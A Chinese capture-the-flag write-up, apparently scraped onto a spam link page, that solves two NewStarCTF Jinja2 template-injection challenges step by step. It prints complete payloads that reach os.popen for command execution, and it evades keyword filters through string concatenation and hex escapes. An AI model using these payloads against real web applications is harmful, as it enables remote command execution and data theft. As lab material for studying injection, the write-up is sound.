当前位置: 首页 > news >正文

网站规划内容网站被挂黑链怎么处理

news 2025/11/14 19:17:52
网站规划内容,网站被挂黑链怎么处理,wordpress 大学网站,为网站做一则广告[NewStarCTF 公开赛赛道]BabySSTI_One 测试发现过滤关键字,但是特殊符号中括号、双引号、点都能用 可以考虑拼接或者编码,这里使用拼接 ?name{{()["__cla"~"ss__"]}}?name{{()["__cla"~"ss__"]["__ba&…

[NewStarCTF 公开赛赛道]BabySSTI_One

测试发现过滤关键字,但是特殊符号中括号、双引号、点都能用

可以考虑拼接或者编码,这里使用拼接


?name={{()["__cla"~"ss__"]}}



?name={{()["__cla"~"ss__"]["__ba"~"se__"]["__subcl"~"asses__"]()}}

 直接命令执行


?name={{()["__cla"~"ss__"]["__ba"~"se__"]["__subcl"~"asses__"]()[117]["__in"~"it__"]["__glob"~"als__"]["po"~"pen"]("ls")["read"]()}}


?name={{()["__cla"~"ss__"]["__ba"~"se__"]["__subcl"~"asses__"]()[117]["__in"~"it__"]["__glob"~"als__"]["po"~"pen"]("ca"~"t"~" "~"app*")["read"]()}}

from flask import Flask, request 
from jinja2 import Template 
import re 
app = Flask(__name__) 
@app.route("/") 
def index(): name = request.args.get('name', 'CTFer') if not re.findall('class|base|init|mro|flag|cat|more|env', name): t = Template("Welcome to NewStarCTF, Dear " + name + "Try to GET me a NAME") return t.render() else: t = Template("Get Out!Hacker!") return t.render() 
if __name__ == "__main__": app.run()

根目录下


?name={{()["__cla"~"ss__"]["__ba"~"se__"]["__subcl"~"asses__"]()[117]["__in"~"it__"]["__glob"~"als__"]["po"~"pen"]("tac /fla*")["read"]()}}

[NewStarCTF 公开赛赛道]BabySSTI_Two

burp测一下过滤哪些

过滤了这些内容,可用如下

尝试十六进制编码绕过


?name={{()['\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f']}}

 

 


#{{()['__class__']['__base__']['__subclasses__']()}}
{{()['__\x63\x6c\x61\x73\x73__']['__base__']['__\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73__']()}}


name={{(()['__\x63\x6c\x61\x73\x73__']['__base__']['__\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73__']()[117])['__\x69\x6e\x69\x74__']['__\x67\x6c\x6f\x62\x61\x6c\x73__']['\x70\x6f\x70\x65\x6e']('ls')['\x72\x65\x61\x64']()}}#    {{(()['__class__']['__base__']['__subclasses__']()[117])['__init__']['__globals__']['popen']('ls')['read']()}}

 

 flag在根目录下


?name={{(()['__\x63\x6c\x61\x73\x73__']['__base__']['__\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73__']()[117])['__\x69\x6e\x69\x74__']['__\x67\x6c\x6f\x62\x61\x6c\x73__']['\x70\x6f\x70\x65\x6e']('\x6c\x73\x20\x2f')['\x72\x65\x61\x64']()}}# {{(()['__class__']['__base__']['__subclasses__']()[117])['__init__']['__globals__']['popen']('ls /')['read']()}}?name={{(()['__\x63\x6c\x61\x73\x73__']['__base__']['__\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73__']()[117])['__\x69\x6e\x69\x74__']['__\x67\x6c\x6f\x62\x61\x6c\x73__']['\x70\x6f\x70\x65\x6e']('\x63\x61\x74\x20\x2f\x66\x6c\x61\x67\x5f\x69\x6e\x5f\x68\x33\x72\x33\x5f\x35\x32\x64\x61\x61\x64')['\x72\x65\x61\x64']()}}# {{(()['__class__']['__base__']['__subclasses__']()[117])['__init__']['__globals__']['popen']('cat /flag_in_h3r3_52daad')['read']()}}

http://www.dtcms.com/a/607939.html

相关文章:

  • 网站建设分金手指专业二八微信公众平台登录入口内村完小
  • 在linux上做网站搭建wordpress主题包下载
  • 如何建设一免费的网站学做面包的网站
  • 做网站最低服务器配置安平百度做网站
  • 源码做网站漯河网站优化
  • 海淀高端企业网站建设智能科技公司取名字大全
  • 创建一个网站 优帮云建个网站怎放上一张图
  • MySQL: 存储引擎深度解析:CSV与Archive的特性、应用与实战演示
  • 大连市公众平台网站新媒体营销案例有哪些
  • 做彩票网站捉怎么处理响应式网页怎么设计
  • 新泰网站制作wordpress使用手册
  • 王稳庄网站建设网站 域名解析错误
  • 网站开发公司如何拓展业务兽装全身定制大概价格
  • 网站建设与设计饰品桐乡网站设计
  • 网站结构图怎么画wordpress贸易主题
  • 做网站排名费用163 邮箱
  • 无限动力营销型网站建设姬月直播
  • 汕头网站制作多少钱温州网站提升排名
  • 个人建站赚钱营销型网站建设风格设定包括哪些方面?
  • 什么职位做网站wordpress路由映射
  • 服务好的郑州网站建设wordpress侧边栏选项卡
  • 阿里云网站中文个人网站seo入门
  • 做网站会遇到的问题简约好看的网站模板
  • 《中医基础理论》- 2.哲学基础之藏象学说-肺系统详解
  • 潞城市网站建设公司网站首页缩略图 seo
  • 网站app建设图片wordpress m1 cms
  • 网站代码开发定制网站域名怎么改
  • 广州做网站新锐免费网站虚拟主机
  • 网站在vps能访问 在本地访问不了做免费采集电影网站犯法吗
  • 做微信小程序和网站那个简单南山做网站哪家专业